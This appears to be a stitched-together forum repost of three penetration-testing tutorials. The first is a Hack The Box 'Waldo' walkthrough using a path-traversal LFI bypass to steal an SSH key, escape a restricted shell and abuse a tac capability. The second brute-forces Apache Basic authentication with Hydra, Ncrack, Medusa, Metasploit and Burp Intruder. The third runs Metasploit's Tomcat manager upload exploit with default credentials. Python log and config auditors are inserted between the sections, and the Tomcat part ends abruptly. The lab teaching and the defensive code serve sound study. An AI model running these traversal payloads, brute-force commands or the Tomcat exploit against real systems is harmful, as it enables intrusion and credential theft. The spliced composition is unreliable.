05-14-2020, 11:05 AM
Level: Intermediate
Task: To find user.txt and root.txt file
Note: Since these labs are available online, they have a static IP. The IP of Waldo is 10.10.10.87
Penetrating Methodology
- Network scanning (Nmap)
- Browsing IP address through HTTP
- Exploiting LFI Vulnerability
- Finding RSA private key through LFI
- Login through SSH using RSA private key
- Escaping restricted shell
- Using Linux “Capabilities” to read the root flag
Let’s start off with our basic nmap command to find out the open ports and services.
nmap -sV -sC -T4 10.10.10.87
![[Image: 1.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-FyqZDacNICs/XB-z12Cfh7I/AAAAAAAAbys/665hvwbJsy88EOTaVFeGr0WV2CsRdj9cACLcBGAs/s1600/1.png?w=687&ssl=1)
The Nmap output shows the open ports: 22 (SSH) and 80 (HTTP).
Since port 80 is running HTTP, we open the IP in our browser.
![[Image: 2.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-P54Tv8fyqoo/XB-z5Ey-1JI/AAAAAAAAbzQ/KFmoK5TwnKc0KhXi4Azg3YhNxFJfkjRKwCLcBGAs/s1600/2.png?w=687&ssl=1)
We find that we are redirected to /list.html. The webpage is a list manager application. We capture its request using Burp Suite and find that it lists the files in the current directory.
![[Image: 3.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-lPZf2w0FWB4/XB-z5BCxlqI/AAAAAAAAbzM/beAH_WbLgOAfG5KlM-jP5i34IIx0ab21wCLcBGAs/s1600/3.png?w=687&ssl=1)
We check whether the application is vulnerable to LFI. Removing “list” from the request lists the files in the current directory, where we find a file called “fileRead.php”. Enumerating the web application, we find that “dirRead.php” can only be used to read the contents of a directory, not to read files. As its name suggests, “fileRead.php” is the page we use to read files.
![[Image: 4.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-zAJaq5LGE9U/XB-z5ERqm0I/AAAAAAAAbzU/oLk__k8D0U404namn-4I_cQQYIhNxW2iACLcBGAs/s1600/4.png?w=687&ssl=1)
We use “fileRead.php” to read /etc/passwd. We change the parameter name from “path” to “file” and use the following string to bypass the traversal filter (each “....//” collapses to “../” once the filter strips a single “../” from it):
./....//....//....//....//etc//passwd
When we check the /etc/passwd file we find a user with a distinctive UID and GID called “nobody”.
![[Image: 5.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-FI-hl2RyTX0/XB-z5xGECWI/AAAAAAAAbzY/3Wp0T3rRCp0IikLxsTtZHPifZMabQSyJwCLcBGAs/s1600/5.png?w=687&ssl=1)
We check the home directory using “dirRead.php” and find a directory called “nobody”. We take a look inside “/home/nobody” and find the directory called “.ssh”. As “.ssh” might contain RSA private key for SSH login, we take a look inside it.
![[Image: 6.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-VvuRZnCvaAg/XB-z6EaTlKI/AAAAAAAAbzg/jQOdfT_-QpEgJPRVVZIK8BhGWoMfvYNlgCLcBGAs/s1600/6.png?w=687&ssl=1)
We take a look inside “/home/nobody/.ssh/” and find a file called “.monitor”.
![[Image: 7.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-Fk7RWEjmMH8/XB-z57FYtqI/AAAAAAAAbzc/EB20tFsSrtE_Ecczpm8_Fg6qsmJILdifgCLcBGAs/s1600/7.png?w=687&ssl=1)
We read the “.monitor” file inside “/home/nobody/.ssh” using “fileRead.php” and find an RSA private key.
![[Image: 8.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-pQXsZYLY_Y8/XB-z664RyGI/AAAAAAAAbzo/SF8ASjoL5mUK8zf9Puywvb87eWkuR5cNwCLcBGAs/s1600/8.png?w=687&ssl=1)
The response is in JSON format, with special characters between the characters of the RSA private key. We decode the JSON response into a plain string with an online JSON decoder.
![[Image: 9.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-6eazmfR29dg/XB-z7f507VI/AAAAAAAAbzk/U-S4bVFMvX0bo9abyNzJdXbYyNcv6BL5ACLcBGAs/s1600/9.png?w=687&ssl=1)
We copy the RSA private key and save it on our system to log in through SSH using this key.
![[Image: 10.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-rChzQUSUANo/XB-z2MS-AkI/AAAAAAAAbyw/QYsnCbv-YhIcTMj1xREXz0h7nUFBJsKxgCLcBGAs/s1600/10.png?w=687&ssl=1)
We change the permissions on the key and log in as user “nobody”, since we are unable to log in as “monitor”.
chmod 600 id_rsa
ssh -i id_rsa nobody@10.10.10.87
Then we take a look at the home directory and find a file called “user.txt”. Its content is the first flag.
![[Image: 11.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-xKjCx-VpRx8/XB-z2C8ec-I/AAAAAAAAby0/fTRqt4adHMw9Nemy9whd0Y69v-cUWSzrQCLcBGAs/s1600/11.png?w=687&ssl=1)
Enumerating the system, we go into the “.ssh” directory and check the authorized_keys file, which shows that the monitor user is allowed to log in. As we were unable to log in as monitor from the external system, we now try to log in as user “monitor” locally using the RSA private key “.monitor”.
ssh -i .monitor monitor@localhost
![[Image: 12.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-abbVz-esmD0/XB-z2379PsI/AAAAAAAAby4/Kl56WDyuedQQ1-75WvZG-D6W8Xvz1Ib9ACLcBGAs/s1600/12.png?w=687&ssl=1)
After logging in as user “monitor” we find that we have a restricted shell.
echo $SHELL
echo $PATH
![[Image: 13.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-aXjl18BZwMM/XB-z3FHnDVI/AAAAAAAAby8/UdUQudAvlpYWsMtuAv3x9UP4Iose2-06wCLcBGAs/s1600/13.png?w=687&ssl=1)
We are not able to change the PATH and SHELL variables, so we use the “-t” argument to request a TTY and run bash directly when logging in through SSH. Once in that shell we are able to change the SHELL and PATH environment variables.
ssh -i .monitor monitor@localhost -t bash
export SHELL=/bin/bash
export PATH=/bin:/sbin:/usr/bin:/usr/sbin:$PATH
![[Image: 14.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-CmVThZNLimc/XB-z3IjCEXI/AAAAAAAAbzA/H7AvWaPlYRg_ZseV3UEd_l2ITE9Zmy6lgCLcBGAs/s1600/14.png?w=687&ssl=1)
Then, enumerating the system, we don’t find anything in particular. Enumerating further, we find that this machine uses Linux “capabilities”. Capabilities are similar to SUID in that they grant a particular file special privileges. We can list them with the “getcap” binary. Recursively searching for files with getcap, we find that the “tac” binary has a capability that lets it read files. Using “tac” we open root.txt inside the root directory and find the final flag.
getcap -r / 2>/dev/null
tac /root/root.txt
![[Image: 16.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-6qb-T7kwAZ4/XB-z4GFJxjI/AAAAAAAAbzI/Rk5hTNEgVAYfAHt8WVlT34bWF20eWo66wCLcBGAs/s1600/16.png?w=687&ssl=1)
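As an added defensive example (not part of the original walkthrough), a small Python audit that parses getcap output in both the old and new libcap line formats and flags binaries carrying capabilities that bypass the file permission model; the sample getcap lines and the /opt/tool path are constructed.

```python
import re
import subprocess

# Capabilities that undercut the file permission model or lead to root outright;
# a binary carrying one of them deserves the same scrutiny as a SUID binary.
RISKY_CAPS = {
    "cap_dac_read_search",  # read any file / search any directory
    "cap_dac_override",     # read, write or execute any file
    "cap_chown", "cap_fowner", "cap_setuid", "cap_setgid",
    "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module", "cap_sys_rawio",
}

# Constructed sample output. Two formats exist: old libcap prints "<path> = <caps>",
# libcap 2.41+ prints "<path> <caps>"; a bare "=ep" means every capability.
SAMPLE_GETCAP = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/tac = cap_dac_read_search+ei
/usr/lib/gstreamer-1.0/gst-ptp-helper cap_net_bind_service,cap_net_admin=ep
/opt/tool =ep
"""


def parse_getcap_line(line):
    """Return (path, set of capability names) or None if the line does not parse."""
    line = line.strip()
    if not line:
        return None
    if " = " in line:
        path, caps = line.split(" = ", 1)
    else:
        parts = line.split(None, 1)
        if len(parts) != 2:
            return None
        path, caps = parts
    names = set()
    for clause in caps.split():
        if clause.startswith("="):
            names.add("ALL")  # "=ep": all capabilities, effective and permitted
            continue
        # "cap_a,cap_b+eip" or "cap_a,cap_b=ep": names come before the operator
        names.update(re.split(r"[+=-]", clause, maxsplit=1)[0].split(","))
    return path, names


def audit(lines):
    """List (path, risky capability names) for every line worth a closer look."""
    findings = []
    for line in lines:
        parsed = parse_getcap_line(line)
        if parsed is None:
            continue
        path, names = parsed
        risky = ["ALL"] if "ALL" in names else sorted(names & RISKY_CAPS)
        if risky:
            findings.append((path, risky))
    return findings


def audit_live_system():
    """Run the walkthrough's own command, getcap -r /, and audit its real output."""
    proc = subprocess.run(["getcap", "-r", "/"], stdout=subprocess.PIPE,
                          stderr=subprocess.DEVNULL, text=True)
    return audit(proc.stdout.splitlines())


if __name__ == "__main__":
    for path, caps in audit(SAMPLE_GETCAP.splitlines()):
        print(f"{path}: {', '.join(caps)}")
```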
In this article, we will learn how to configure a password-protected Apache web server so that online visitors cannot see essential or critical information without validating themselves, and then how to attack that configuration when it is weak in order to break its security and exploit it.
Table of Content
Introduction to HTTP Basic Authentication
- Lab Set_up Requirement
- Installing the Apache utility Package
- Creating the Password File
- Configuring Access Control inside the Virtual Host Definition
- Configuring Access Control with .htaccess Files
- Confirm the Password Authentication
- xHydra
- Hydra
- Ncrack
- Medusa
- Metasploit
- Burp Suite
In the context of an HTTP transaction, basic access authentication is a method for an HTTP user agent to provide a username and password when making a request.
HTTP Basic authentication (BA) is the simplest technique for enforcing access controls to web resources because it doesn’t require cookies, session identifiers, or login pages; rather, HTTP Basic authentication uses standard fields in the HTTP header, obviating the need for handshakes.
The BA mechanism provides no confidentiality protection for the transmitted credentials. They are merely encoded with Base64 in transit, not encrypted or hashed in any way. HTTPS is therefore typically used in conjunction with Basic authentication.
For more details read from wikipedia.org
Lab Setup Requirement
Apache Server (Ubuntu 14.04)
Penetration Testing Machine (Kali Linux)
Set Up Password Authentication
Installing the Apache utility Package
Let’s start with the following command to install the Apache2 utility package, which provides ‘htpasswd’. htpasswd is used to create and update the flat files that store usernames and passwords for basic authentication of HTTP users.
sudo apt-get install apache2 apache2-utils
![[Image: 1.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-AQuA1Egk3sU/XB0aFYUcqII/AAAAAAAAbws/-Apz_TOkaT4U4RUr0gyUw8U8EVN1WujMQCLcBGAs/s1600/1.png?w=687&ssl=1)
Creating the Password File
Now use the htpasswd command to create the password file that Apache will use to authenticate users. We store it as the hidden file “.htpasswd” in our /etc/apache2 configuration directory.
sudo htpasswd -c /etc/apache2/.htpasswd raj
cat /etc/apache2/.htpasswd
![[Image: 2.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-ESSLEV0B5r4/XB0aHjsJHnI/AAAAAAAAbxI/1JrcQx8bpUcFE7ZncVNhLE_qnKudwBUgwCLcBGAs/s1600/2.png?w=687&ssl=1)
Configuring Access Control inside the Virtual Host Definition
Now save the following configuration in the 000-default.conf file.
sudo gedit /etc/apache2/sites-enabled/000-default.conf
<Directory "/var/www/html">
AuthType Basic
AuthName "Restricted Content"
AuthUserFile /etc/apache2/.htpasswd
Require valid-user
</Directory>
![[Image: 3.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-ynpQE3Puc20/XB0aKdMTdPI/AAAAAAAAbxk/gclkRw46q7srRFqBKyLpC7IZCU4cTUyUwCLcBGAs/s1600/3.png?w=687&ssl=1)
Configuring Access Control with .htaccess Files
Open the main Apache configuration file to enable password protection using .htaccess files and add the following line as highlighted.
sudo gedit /etc/apache2/apache2.conf
ServerName localhost
![[Image: 4.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-zn0Tfpof__o/XB0aLdNn6WI/AAAAAAAAbxw/9BYLhp2DDWwnI40l9p5xIrZYfvdxeFtcACLcBGAs/s1600/4.png?w=687&ssl=1)
Enable .htaccess processing by changing the AllowOverride directive from “None” to “All” in the block for the /var/www directory, then save the file and restart the Apache service.
<Directory /var/www/>
Options Indexes FollowSymLinks
AllowOverride All
Require all granted
</Directory>
![[Image: 5.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-3VelJBh77BU/XB0aLY_4RsI/AAAAAAAAbx0/tFu9AHac51klaQYKtPfm4-bsf7C2ymoxACLcBGAs/s1600/5.png?w=687&ssl=1)
Next, you need to add a .htaccess file to the directory you wish to restrict. Here I want to restrict the entire website, which is served from /var/www/html, but you can place this file in any directory where you wish to restrict access:
AuthType Basic
AuthName "Restricted Content"
AuthUserFile /etc/apache2/.htpasswd
Require valid-user
sudo service apache2 restart
While configuring the .htaccess file we added a few directives for the directory block. Let’s see what each one means.
AuthType Basic: enables HTTP Basic authentication for this location.
AuthName “Restricted Content”: the realm name shown in the browser’s credential prompt.
AuthUserFile /etc/apache2/.htpasswd: the location of the password file created with htpasswd.
Require valid-user: only users who authenticate successfully against that file are permitted to access the website.
![[Image: 6.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-7myTDt7uqf0/XB0aL6NbfpI/AAAAAAAAbx4/DgAfqhw6mPswiSpAaVHEqD9O47VdwA77gCLcBGAs/s1600/6.png?w=687&ssl=1)
Confirm the Password Authentication
Try to access your restricted content in a web browser to confirm that it is protected. It will be accessible only through a username and password prompt that looks like this:
![[Image: 7.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-uinHRnEOxdY/XB0aMfsJ5yI/AAAAAAAAbx8/KwB6AYfXlyQJxcB2gy1Z42lPLoAJy_pFACLcBGAs/s1600/7.png?w=687&ssl=1)
If you try to access the website without authenticating, or cancel the authentication prompt, the server displays a 401 Unauthorized error.
![[Image: 8.1.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-8C68z14mCMk/XB0aMVtxq_I/AAAAAAAAbyA/QLF53GsSWyEGqSZj-dkwAUHEEFgaFV94ACLcBGAs/s1600/8.1.png?w=687&ssl=1)
A valid user can access the password-protected website with valid credentials; for example, we created the account raj:123 to access the Apache HTTP service.
![[Image: 8.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-U_nO_7O4cBY/XB0aM-jIi6I/AAAAAAAAbyE/243bjfb_rWw_70WsK8M2LID1r1qKfdbAQCLcBGAs/s1600/8.png?w=687&ssl=1)
As you can observe, we are now able to access the content of the website.
![[Image: 9.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-ofFxA4gSSQc/XB0aNF0jjAI/AAAAAAAAbyI/9vUotW6pQpUd45tni42DcSuJVnfX9UtEQCLcBGAs/s1600/9.png?w=687&ssl=1)
Exploiting HTTP Authentication
xHydra
xHydra is the graphical version of Hydra, used here to run a dictionary attack against the web login. For this method to work:
Open xHydra in Kali, select the Single Target option and enter the IP of your target. Select HTTP in the Protocol box and enter port number 80 in the Port option.
![[Image: 10.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-vv5EpECJR6I/XB0aFRsmGhI/AAAAAAAAbww/mg9O2hmamgwXJ_9vPYeJGpbl5LR_f2fFACLcBGAs/s1600/10.png?w=687&ssl=1)
Now go to the Passwords tab, select Username List and give the path of the text file containing usernames in the adjacent box.
Then select Password List and give the path of the text file containing the passwords in the adjacent box.
![[Image: 11.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-NHVlrfNFeFc/XB0aFHrLSbI/AAAAAAAAbwo/DP0FdCzM9UwloPs5xbl6zGOiCVPnpL67wCLcBGAs/s1600/11.png?w=687&ssl=1)
After doing this, go to the Start tab and click the Start button on the left.
The dictionary attack will now start and, if the wordlists contain them, you will obtain the username and password of the target.
![[Image: 13.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-wqWTz9ZTLiU/XB0aGC9v4WI/AAAAAAAAbw0/ycO5NU87enYWoNoFpUX-IH-LsFaQ9TZrACLcBGAs/s1600/13.png?w=687&ssl=1)
Hydra
Hydra is often the tool of choice. It can perform rapid dictionary attacks against more than 50 protocols, including telnet, FTP, HTTP, HTTPS, SMB, several databases, and much more.
Next we need to choose a wordlist. As with any dictionary attack, the wordlist is key. Kali has numerous wordlists built in.
Run the following command:
hydra -L user.txt -P pass.txt 192.168.0.105 http-get
-L: denotes the path for username list
-P: denotes the path for the password list
Once the command is executed it starts the dictionary attack, and you will have the right username and password in no time. As you can observe, we successfully recovered the HTTP username raj and password 123.
![[Image: 14.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-NPs5XbkdCHo/XB0aGi3oOZI/AAAAAAAAbw4/ZFH3IWQgqOohNgZCkTydK0QuRsw5hcUFQCLcBGAs/s1600/14.png?w=687&ssl=1)
Ncrack
Ncrack is a high-speed network authentication cracking tool. It was built to help companies secure their networks by proactively testing all their hosts and networking devices for poor passwords.
Run the following command:
ncrack -U user.txt -P pass.txt
[To see content please register here]
Here
-U: denotes the path for username list
-P: denotes the path for the password list
As you can observe, we successfully recovered the HTTP username raj and password 123.
![[Image: 15.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-hbCco0GU9xc/XB0aGjpKiMI/AAAAAAAAbw8/R6LnDYIbaFogb9fpMKwGIm-XNyLnDAWYQCLcBGAs/s1600/15.png?w=687&ssl=1)
Medusa
Medusa is intended to be a speedy, massively parallel, modular login brute-forcer. It supports many protocols: AFP, CVS, FTP, HTTP, IMAP, rlogin, SSH, Subversion, and VNC, to name a few.
Run the following command:
medusa -h 192.168.0.105 -U user.txt -P pass.txt -M http -f
Here
-U: denotes the path for username list
-P: denotes the path for the password list
As you can observe, we successfully recovered the HTTP username raj and password 123.
![[Image: 16.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-Xouo65ZzKOw/XB0aHQlz1NI/AAAAAAAAbxA/lcTFTRllh9AGA21HFt4j2cW2I6UpRHMNgCLcBGAs/s1600/16.png?w=687&ssl=1)
Metasploit
This Metasploit module attempts to authenticate to an HTTP service. Open a Kali terminal, type msfconsole and then type:
use auxiliary/scanner/http/http_login
msf auxiliary(scanner/http/http_login) > set user_file user.txt
msf auxiliary(scanner/http/http_login) > set pass_file pass.txt
msf auxiliary(scanner/http/http_login) > set rhosts 192.168.0.105
msf auxiliary(scanner/http/http_login) > set stop_on_success true
msf auxiliary(scanner/http/http_login) > exploit
![[Image: 17.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-BWodAnt3EaI/XB0aHlMJjXI/AAAAAAAAbxE/73Vo4pyWz-saqisvHVMU3mvE4Yvg3s-hQCLcBGAs/s1600/17.png?w=687&ssl=1)
Burp Suite
Here I typed a random value into the authentication prompt so that the request could be captured with Burp Suite. Before sending the request to the server, turn on Burp Suite, select the Proxy tab, click “Intercept is on”, and then submit the credentials by clicking OK.
![[Image: 24.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-wDF3F26ZG_M/XB0aIcTU6LI/AAAAAAAAbxM/RRngvWlB6bMDiFmB_P5FBAWIz5osRTWYwCLcBGAs/s1600/24.png?w=687&ssl=1)
The sent request is captured by Burp Suite, as you can see in the image below. In the screenshot I have highlighted a value in the last line: it says the authentication type is Basic and, as described in the theory above, the credentials are Base64 encoded.
Now we generate the encoded authentication value inside Burp Suite. Click the Action tab and select Send to Intruder for an HTTP fuzzing attack.
![[Image: 25.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-QhQqim0Lz-I/XB0aIukhX8I/AAAAAAAAbxU/jjpkqu8Co9wk59VNdGOLed4WnfsllKnwACLcBGAs/s1600/25.png?w=687&ssl=1)
Now open the Intruder tab and click Positions. Configure the position where the payload will be inserted into the request; the attack type determines how payloads are assigned to payload positions. Select “the encoded value of authentication” as the payload position and click the Add button on the left side of the frame.
![[Image: 26.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-pjbCRlVgXoo/XB0aITm1zyI/AAAAAAAAbxQ/xi9kzpdrIt8Z5du63kfp7_O3wXhpQfKbgCLcBGAs/s1600/26.png?w=687&ssl=1)
The Base64-encoded authentication value is a combination of the username and password, so the plan is to generate the same encoded value from a user:password dictionary. I have therefore made a dictionary text file containing username:password pairs.
To use the dictionary as the payload, click the Payloads tab under Intruder and load the dictionary containing the username:password pairs from Payload Options.
![[Image: 27.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-9LeWyi2qSMQ/XB0aJU5GPLI/AAAAAAAAbxY/wSN0idL9W-87-i3uPjSRqwYxDwEsULhJQCLcBGAs/s1600/27.png?w=687&ssl=1)
But we want the request to carry the encoded form of each payload. To encode the payload, click the Add button under Payload Processing.
A new dialog box opens to select a rule: choose Encode as the rule type and, in the drop-down list (which defaults to URL-encode key characters), select Base64-encode for payload processing.
![[Image: 28.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-mARUwOcuPxc/XB0aJRrV-HI/AAAAAAAAbxg/_SjepXHLLrMZEZDR2llJ6BJqTLt2iLf6ACLcBGAs/s1600/28.png?w=687&ssl=1)
Starting the attack brute-forces the string used for user authentication. In the screenshot you can observe that the highlighted value has status “200 OK” and length “11788”, different from the rest of the results. This means the encoded value at request number 5 is a valid credential. Checking the 5th line of the dictionary, I found raj:123 as the matching credential.
You can also use this encoded Auth value directly to pass the Apache HTTP authentication page via Burp Suite’s intercepted data.
![[Image: 29.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-PDpGZ09LkVY/XB0aJsQM6jI/AAAAAAAAbxc/fgmuxeYaL2AincTrqfuYbNsfUBJz8pn6wCLcBGAs/s1600/29.png?w=687&ssl=1)
Copy the above auth value, replace the intercepted Authorization value with it as shown below, and forward the request to access the restricted content.
![[Image: 30.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-CBOQJ0jUkNM/XB0aKXFWfJI/AAAAAAAAbxo/NFtHQxWdwj49Ip9hzYfXlWgS3bCDphxKACLcBGAs/s1600/30.png?w=687&ssl=1)
Booom!!! Here we have successfully accessed the content of the website.
![[Image: 31.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-3TENecJmk_M/XB0aK2q_0lI/AAAAAAAAbxs/ZI6aeJ34rCkj0Of-V9sDlqLbrzLbVi5MACLcBGAs/s1600/31.png?w=687&ssl=1)
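The tools above all leave the same trace on the server: a burst of 401 responses from one source, followed by a 200 once a guess lands. As an added defensive example (not code from the article), the following Python decodes a Basic Authorization header as discussed in the Burp section and flags brute-force bursts in Apache access-log lines; the log lines and the client IPs are constructed, with the response length 11788 taken from the article.

```python
import base64
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache common/combined log prefix: ip ident user [time] "request" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+'
)

# Constructed sample: 12 failed guesses in 12 seconds from one client, then a success;
# a second client mistypes once and then logs in normally.
SAMPLE_LOG = [
    f'192.168.0.106 - - [14/May/2020:11:05:{sec:02d} +0000] "GET / HTTP/1.1" 401 459'
    for sec in range(12)
] + [
    '192.168.0.106 - raj [14/May/2020:11:05:12 +0000] "GET / HTTP/1.1" 200 11788',
    '192.168.0.50 - - [14/May/2020:11:05:03 +0000] "GET / HTTP/1.1" 401 459',
    '192.168.0.50 - raj [14/May/2020:11:05:09 +0000] "GET / HTTP/1.1" 200 11788',
]


def decode_basic_header(value):
    """Turn 'Basic cmFqOjEyMw==' into ('raj', '123'); None if not Basic/valid base64."""
    scheme, _, token = value.strip().partition(" ")
    if scheme.lower() != "basic":
        return None
    try:
        raw = base64.b64decode(token, validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError
        return None
    user, _, password = raw.partition(":")
    return user, password


def parse_access_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "user": m.group("user"),
        "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
        "status": int(m.group("status")),
        "request": m.group("req"),
    }


def find_bruteforce(lines, threshold=10, window=timedelta(seconds=60)):
    """Return {ip: summary} for clients with >= threshold 401s inside `window`."""
    by_ip = defaultdict(list)
    for line in lines:
        rec = parse_access_line(line)
        if rec:
            by_ip[rec["ip"]].append(rec)
    alerts = {}
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r["ts"])
        fails = [r["ts"] for r in recs if r["status"] == 401]
        start = 0
        for end in range(len(fails)):          # sliding window over failure times
            while fails[end] - fails[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                # an authenticated 200 after the burst means a guess landed
                success = next((r["user"] for r in recs if r["status"] == 200
                                and r["user"] != "-" and r["ts"] >= fails[end]), None)
                alerts[ip] = {"failures_401": len(fails), "first": fails[0],
                              "succeeded_as": success}
                break
    return alerts


if __name__ == "__main__":
    print(decode_basic_header("Basic cmFqOjEyMw=="))
    for ip, info in find_bruteforce(SAMPLE_LOG).items():
        print(ip, info)
```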
Hopefully you have enjoyed this article and learned how easily a weak configuration can be breached, letting an unauthorized person access the restricted content of your website.
Hello friends, today through this article I would like to share my experience of how to exploit the Tomcat Manager application when it has the default login credentials (tomcat:tomcat). While playing CTFs I have often found Apache Tomcat running on the target machine with the default login configured, which can give us a shell on the remote machine. Therefore I feel I should write up all the ways I know to exploit the Tomcat manager application to gain a web shell on the remote machine.
Table of Content
- Tomcat Manager Authenticated Upload Code Execution
- Generate .war Format Backdoor
- Tomcat War Deployer Script
- Generate a JSP Webshell
nmap -sV -p8080 192.168.1.101
![[Image: 1.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-ml43P-L_v4w/XBUvOsbQSpI/AAAAAAAAbvc/jA7Q5pIAG9AsDfdsA3DS4dLs_wSuLs_VgCLcBGAs/s1600/1.png?w=687&ssl=1)
From the nmap output we found port 8080 open for Apache Tomcat. Navigating to Target IP:port in the web browser, we saw the HTTP authentication prompt for logging in to the Tomcat manager application.
![[Image: 2.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-RM_zG0QelS0/XBUvQKbQipI/AAAAAAAAbvs/VhghCRlap64mTDjPOBY6YoTPbvXwkX4NgCLcBGAs/s1600/2.png?w=687&ssl=1)
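Whether a manager login succeeds with tomcat:tomcat is decided by tomcat-users.xml. As an added defensive example (not from the article), the following Python audits that file for default or cleartext credentials on accounts holding manager roles; the sample file, its account names and the digest value are constructed, and the default-pair list is a small starting set to extend.

```python
import xml.etree.ElementTree as ET

# Roles that reach the manager/host-manager applications (real Tomcat role names).
PRIVILEGED_ROLES = {"manager-gui", "manager-script", "manager-jmx",
                    "manager-status", "admin-gui", "admin-script"}

# Well-known default pairs; tomcat:tomcat is the one the article relies on.
DEFAULT_PAIRS = {("tomcat", "tomcat"), ("tomcat", "s3cret"), ("admin", "admin"),
                 ("role1", "tomcat"), ("both", "tomcat")}

# Constructed sample tomcat-users.xml (not from any real deployment).
SAMPLE_TOMCAT_USERS = """
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <role rolename="manager-status"/>
  <user username="tomcat" password="tomcat" roles="manager-gui,manager-script"/>
  <user username="deploy" password="0a1b2c3d$10000$deadbeefcafef00d" roles="manager-script"/>
  <user username="viewer" password="viewer" roles="manager-status"/>
  <user username="alice" password="correct-horse" roles="probe"/>
</tomcat-users>
"""


def audit_tomcat_users(xml_text):
    """Return {username: (severity, [reasons])} for accounts worth fixing."""
    findings = {}
    for el in ET.fromstring(xml_text).iter():
        if el.tag.split("}")[-1] != "user":  # tolerate the tomcat XML namespace
            continue
        name = el.get("username") or el.get("name") or ""
        password = el.get("password", "")
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        reasons = []
        if (name, password) in DEFAULT_PAIRS:
            reasons.append("well-known default credential")
        elif password == name:
            reasons.append("password equals username")
        elif password and "$" not in password:
            # Heuristic: Tomcat's credential handlers store "salt$iterations$digest";
            # a value without '$' is treated as cleartext (legacy unsalted digests
            # will also trip this and deserve a look anyway).
            reasons.append("cleartext password")
        if "manager-gui" in roles and roles & {"manager-script", "manager-jmx"}:
            # The Tomcat manager docs advise against combining these on one account.
            reasons.append("manager-gui combined with manager-script/manager-jmx")
        if reasons:
            severity = "high" if roles & PRIVILEGED_ROLES else "medium"
            findings[name] = (severity, reasons)
    return findings


def audit_file(path):
    """Audit a real tomcat-users.xml, e.g. $CATALINA_BASE/conf/tomcat-users.xml."""
    with open(path, encoding="utf-8") as fh:
        return audit_tomcat_users(fh.read())


if __name__ == "__main__":
    for user, (severity, reasons) in audit_tomcat_users(SAMPLE_TOMCAT_USERS).items():
        print(f"[{severity}] {user}: {'; '.join(reasons)}")
```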
Tomcat Manager Authenticated Upload Code Execution
This module can be used to execute a payload on Apache Tomcat servers that have an exposed “manager” application. The payload is uploaded as a WAR archive containing a JSP application using a POST request against the /manager/html/upload component. NOTE: The compatible payload sets vary based on the selected target. For example, you must select the Windows target to use native Windows payloads.
use exploit/multi/http/tomcat_mgr_upload
msf exploit(multi/http/tomcat_mgr_upload) > set rhost 192.168.1.101
msf exploit(multi/http/tomcat_mgr_upload) > set rport 8080
msf exploit(multi/http/tomcat_mgr_upload) > set httpusername tomcat
msf exploit(multi/http/tomcat_mgr_upload) > set httppassword tomcat
msf exploit(multi/http/tomcat_mgr_upload) > exploit
As a result, you can observe that we have a meterpreter session on the target machine.
